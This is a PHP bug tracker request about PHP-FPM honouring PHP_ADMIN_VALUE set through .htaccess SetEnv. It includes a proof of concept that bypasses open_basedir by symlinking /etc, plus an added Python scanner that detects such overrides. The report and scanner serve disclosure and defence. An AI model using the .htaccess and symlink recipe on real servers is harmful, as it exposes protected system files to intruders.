Request #72129 PHP_VALUE, PHP_ADMIN_VALUE... changed by environment variables set in .htaccess
Submitted: 2016-04-29 15:46 UTC
Modified: 2021-12-04 18:23 UTC
From: ouroboros_17 at hotmail dot com
Assigned: bukka
Status: Assigned
Package: FPM related
PHP Version: 5.6.21
OS: Debian (all Linux distributions)
Private report: No
CVE-ID: None

 [2016-04-29 15:46 UTC] ouroboros_17 at hotmail dot com
Description:
------------
It is possible, for a malicious user, to change PHP configuration with a .htaccess file on Apache with PHP-FPM. It is not something trivial, but if he can upload a .htaccess in the www folder, he can break open_basedir restrictions (see example below).

This behaviour can be fixed:
- AllowOverride None in Apache configuration (a good practice but it is not really usual in the real world)
- prevent upload of .htaccess (application side, not related to PHP-FPM)
- disable mod_env

PHP as a module of Apache cannot be affected because only php_value can be set in .htaccess.

It should be documented at least, or it should be possible to disable the ability to set configuration via environment variables.

See bug #3991 too.

Test script:
---------------
Apache vhost
------------------
DocumentRoot /var/www
<Directory /var/www/>
  AllowOverride All

  <FilesMatch \.php$>
    SetHandler "proxy:unix:/var/run/php5-fpm.sock|fcgi://localhost/"
  </FilesMatch>
</Directory>


/var/www/.htaccess
------------------
Options +FollowSymLinks -SymLinksIfOwnerMatch
SetEnv PHP_ADMIN_VALUE "open_basedir=/"


/var/www/index.php
------------------
<?php symlink('/etc', 'foo');


PHP-FPM pool
------------------
[...]
php_admin_value[open_basedir] = /var/www


Access "index.php" with HTTP so it creates the symlink, see files in /etc via the http://example.com/foo URI.
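
An added example, not part of the original report and not code from PHP or Apache: a Python audit that walks a document root and flags .htaccess files whose SetEnv lines set PHP_VALUE or PHP_ADMIN_VALUE, as in the test script above. The function names and the sample input are constructed for illustration, and it assumes the override file keeps the default name .htaccess.

```python
import os
import shlex

# Variable names taken from the report title.
WATCHED = {"PHP_VALUE", "PHP_ADMIN_VALUE"}

def logical_lines(text):
    """Yield (first_line_no, line), joining lines that end in a backslash."""
    buf, start = "", 0
    for no, raw in enumerate(text.splitlines(), 1):
        start = start if buf else no
        if raw.endswith("\\"):
            buf += raw[:-1] + " "
            continue
        yield start, (buf + raw).strip()
        buf = ""
    if buf:  # file ended on a continuation line
        yield start, buf.strip()

def find_php_env_overrides(text):
    """Return (line_no, variable, ini_key, ini_value) per watched SetEnv."""
    hits = []
    for no, line in logical_lines(text):
        if not line or line.startswith("#"):
            continue
        try:
            words = shlex.split(line)
        except ValueError:  # unbalanced quote: fall back to a plain split
            words = line.split()
        # Directive names are case-insensitive; variable names are not.
        if len(words) >= 2 and words[0].lower() == "setenv" and words[1] in WATCHED:
            key, _, val = (words[2] if len(words) > 2 else "").partition("=")
            hits.append((no, words[1], key.strip(), val.strip()))
    return hits

def scan_tree(root, name=".htaccess"):
    """Map each override file under root to its hits (default file name assumed)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_php_env_overrides(fh.read())
            if hits:
                report[path] = hits
    return report

# Constructed sample: the report's .htaccess plus a comment and a benign SetEnv.
SAMPLE = 'Options +FollowSymLinks -SymLinksIfOwnerMatch\n# SetEnv PHP_VALUE "x=1"\n' \
         'SetEnv APP_ENV production\nsetenv PHP_ADMIN_VALUE \\\n    "open_basedir=/"\n'
```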


 [2016-04-29 22:53 UTC] stas@php.net
-Assigned To: +Assigned To: fat
 [2017-10-24 07:45 UTC] kalle@php.net
-Status: Assigned +Status: Open -Assigned To: fat +Assigned To:
 [2021-07-12 16:05 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2021-07-12 16:05 UTC] cmb@php.net
> but if he can upload a .htaccess in the www folder, he can break
> open_basedir restrictions

open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.

Besides that the possibility to upload a .htaccess to the web root
would be a serious issue of the application.

> /var/www/index.php
> ------------------
> <?php symlink('/etc', 'foo');

This code looks obviously malicious, so is not a security issue
according to <https://wiki.php.net/security#not_a_security_issue>.
 [2021-12-04 18:23 UTC] bukka@php.net
-Type: Bug +Type: Feature/Change Request
 [2021-12-04 18:23 UTC] bukka@php.net
This behaviour is on purpose and its mitigation (optional disabling) is treated as a feature.
 [2021-12-04 18:23 UTC] bukka@php.net
-Assigned To: +Assigned To: bukka